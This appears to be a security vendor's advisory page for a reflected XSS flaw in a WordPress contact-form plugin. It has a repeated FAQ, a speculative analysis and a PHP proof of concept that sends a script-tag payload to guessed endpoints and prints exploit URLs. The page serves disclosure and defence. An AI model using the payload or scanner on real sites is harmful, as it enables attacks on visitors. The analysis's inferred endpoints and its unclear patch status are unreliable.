What is CVE-2026-0753?

CVE-2026-0753 is a reflected cross-site scripting (XSS) vulnerability in the Super Simple Contact Form plugin for WordPress. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘sscf_name’ parameter due to insufficient input sanitization and output escaping.

How does the vulnerability work?

The vulnerability works by allowing attackers to craft a malicious URL that includes a JavaScript payload in the ‘sscf_name’ parameter. When a victim clicks the link, the unsanitized input is reflected back in the response, executing the script in the victim’s browser context.

Who is affected by this vulnerability?

Any WordPress site using the Super Simple Contact Form plugin version 1.6.2 or earlier is affected. Site administrators should verify their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Super Simple Contact Form plugin installed. If it is version 1.6.2 or earlier, your site is at risk. Additionally, you can test for the vulnerability by attempting to inject a script in the ‘sscf_name’ parameter and observing if it executes.

What is the risk level of this vulnerability?

The vulnerability has a CVSS score of 7.2, classified as High severity. This indicates a significant risk, as successful exploitation can lead to arbitrary JavaScript execution, potentially compromising user sessions and site integrity.

How can I fix or mitigate this issue?

To mitigate this issue, update the Super Simple Contact Form plugin to the latest version where the vulnerability is fixed. Additionally, implement proper input validation and output escaping in your code using WordPress functions like sanitize_text_field() and esc_attr().

What should developers do to secure their code?

Developers should ensure that all user input is properly sanitized and escaped before being rendered in the output. Regular code audits and using WordPress core functions for sanitization and escaping can help prevent similar vulnerabilities.

What does the proof of concept demonstrate?

The proof of concept demonstrates a potential attack vector by simulating a reflected XSS attack against the vulnerable plugin. It highlights how an attacker can exploit the vulnerability by crafting a malicious URL that executes JavaScript in the victim’s browser.

What are the potential consequences of exploitation?

If exploited, an attacker could execute arbitrary JavaScript in the context of the victim’s browser, leading to session hijacking, data theft, or unauthorized actions on behalf of the user. The impact can vary based on the victim’s privilege level.

Is there a way to test for this vulnerability safely?

Yes, testing should be conducted in a controlled environment or staging site. Use the proof of concept code to simulate the attack without affecting production systems. Always obtain permission before testing any live site.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0753: Super Simple Contact Form <= 1.6.2 – Reflected Cross-Site Scripting via 'sscf_name' Parameter (super-simple-contact-form)

CVE ID CVE-2026-0753

Plugin super-simple-contact-form

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 1.6.2

Patched Version —

Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0753 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Super Simple Contact Form WordPress plugin. The ‘sscf_name’ parameter lacks proper input sanitization and output escaping in all plugin versions up to and including 1.6.2. Unauthenticated attackers can exploit this vulnerability to inject arbitrary JavaScript, which executes in the victim’s browser context. The CVSS score of 7.2 (High) reflects its network-based attack vector, low attack complexity, and scope change impact.

Atomic Edge research indicates the root cause is improper neutralization of user input during web page generation (CWE-79). The vulnerability description confirms insufficient input sanitization and output escaping. Without access to the plugin’s source code, we infer the plugin likely echoes the unsanitized ‘sscf_name’ parameter value directly into the server’s HTTP response. This inference is based on the CWE classification and the reflected XSS nature of the attack. The plugin fails to apply WordPress sanitization functions like `sanitize_text_field()` or output escaping functions like `esc_attr()` before rendering the parameter value.

Exploitation requires an attacker to craft a malicious URL containing a JavaScript payload within the ‘sscf_name’ parameter. A victim must click this link while authenticated to the WordPress site. The exact endpoint is not specified in the metadata. However, Atomic Edge analysis of WordPress plugin patterns suggests the vulnerability likely exists in a public-facing contact form submission handler. This handler could be an AJAX endpoint (`/wp-admin/admin-ajax.php`), a REST API route, or a direct plugin file. The payload would be a standard XSS vector like `alert(document.domain)` or a more malicious script designed to steal session cookies.

Remediation requires implementing proper input validation and output escaping. The plugin developers should sanitize the ‘sscf_name’ parameter on receipt using WordPress core functions such as `sanitize_text_field()`. They must also escape the parameter on output using context-appropriate functions like `esc_attr()` for HTML attributes or `esc_html()` for text nodes. A comprehensive fix would involve auditing all user-input parameters across the plugin’s codebase for similar issues.

Successful exploitation leads to arbitrary JavaScript execution within the victim’s browser session. Impact severity depends on the victim’s privilege level. For an administrator user, this could result in full site compromise. Attackers could create new administrative accounts, inject backdoors, or deface the website. For lower-privileged users, attackers could perform actions on their behalf, leading to data theft or privilege escalation. The CVSS vector indicates a scope change (S:C), meaning the vulnerability can affect components beyond the plugin’s security scope.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-0753 - Super Simple Contact Form <= 1.6.2 - Reflected Cross-Site Scripting via 'sscf_name' Parameter
<?php
/**
 * Proof of Concept for CVE-2026-0753.
 * This script demonstrates a reflected XSS attack against the Super Simple Contact Form plugin.
 * The exact vulnerable endpoint is not publicly documented. This PoC tests common WordPress patterns.
 * Assumptions:
 *   1. The 'sscf_name' parameter is reflected unsanitized in the HTTP response.
 *   2. The vulnerability is accessible via a public endpoint (AJAX, REST, or form handler).
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CONFIGURE THIS

// Common WordPress endpoints where plugin form handlers might reside
$endpoints_to_test = [
    '/wp-admin/admin-ajax.php',          // AJAX handler
    '/wp-admin/admin-post.php',          // Admin POST handler
    '/wp-content/plugins/super-simple-contact-form/', // Direct plugin path (needs specific file)
    '/',                                 // Front-page form submission
    '/contact/',                         // Common contact page slug
];

// Basic XSS payload to test for reflection
$payload = '"><script>alert(`Atomic Edge XSS Test: ${document.domain}`)</script>';

// Test each endpoint with a GET request containing the malicious parameter
foreach ($endpoints_to_test as $endpoint) {
    $test_url = $target_url . $endpoint;
    $full_url = $test_url . '?sscf_name=' . urlencode($payload);
    
    echo "[*] Testing: $full_urln";
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $full_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    curl_close($ch);
    
    // Check if payload is reflected unsanitized
    if (strpos($response, $payload) !== false) {
        echo "[!] POTENTIAL VULNERABILITY DETECTED. Payload reflected in response from $endpointn";
        echo "    Crafted exploit URL: $full_urln";
        // In a real attack, this URL would be sent to a victim
    }
}

// Note: A real exploit would use a more stealthy payload and likely involve POST requests.
// The vulnerable endpoint might require a specific 'action' parameter for AJAX handlers.
// Without the plugin source, this PoC demonstrates the attack vector but may need adjustment.
?>

Frequently Asked Questions

What is CVE-2026-0753?
Understanding the vulnerability
CVE-2026-0753 is a reflected cross-site scripting (XSS) vulnerability in the Super Simple Contact Form plugin for WordPress. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘sscf_name’ parameter due to insufficient input sanitization and output escaping.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability works by allowing attackers to craft a malicious URL that includes a JavaScript payload in the ‘sscf_name’ parameter. When a victim clicks the link, the unsanitized input is reflected back in the response, executing the script in the victim’s browser context.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the Super Simple Contact Form plugin version 1.6.2 or earlier is affected. Site administrators should verify their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Super Simple Contact Form plugin installed. If it is version 1.6.2 or earlier, your site is at risk. Additionally, you can test for the vulnerability by attempting to inject a script in the ‘sscf_name’ parameter and observing if it executes.
What is the risk level of this vulnerability?
Understanding severity
The vulnerability has a CVSS score of 7.2, classified as High severity. This indicates a significant risk, as successful exploitation can lead to arbitrary JavaScript execution, potentially compromising user sessions and site integrity.
How can I fix or mitigate this issue?
Remediation steps
To mitigate this issue, update the Super Simple Contact Form plugin to the latest version where the vulnerability is fixed. Additionally, implement proper input validation and output escaping in your code using WordPress functions like sanitize_text_field() and esc_attr().
What should developers do to secure their code?
Best practices for developers
Developers should ensure that all user input is properly sanitized and escaped before being rendered in the output. Regular code audits and using WordPress core functions for sanitization and escaping can help prevent similar vulnerabilities.
What does the proof of concept demonstrate?
Understanding the PoC
The proof of concept demonstrates a potential attack vector by simulating a reflected XSS attack against the vulnerable plugin. It highlights how an attacker can exploit the vulnerability by crafting a malicious URL that executes JavaScript in the victim’s browser.
What are the potential consequences of exploitation?
Impact of successful attacks
If exploited, an attacker could execute arbitrary JavaScript in the context of the victim’s browser, leading to session hijacking, data theft, or unauthorized actions on behalf of the user. The impact can vary based on the victim’s privilege level.
Is there a way to test for this vulnerability safely?
Safe testing practices
Yes, testing should be conducted in a controlled environment or staging site. Use the proof of concept code to simulate the attack without affecting production systems. Always obtain permission before testing any live site.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations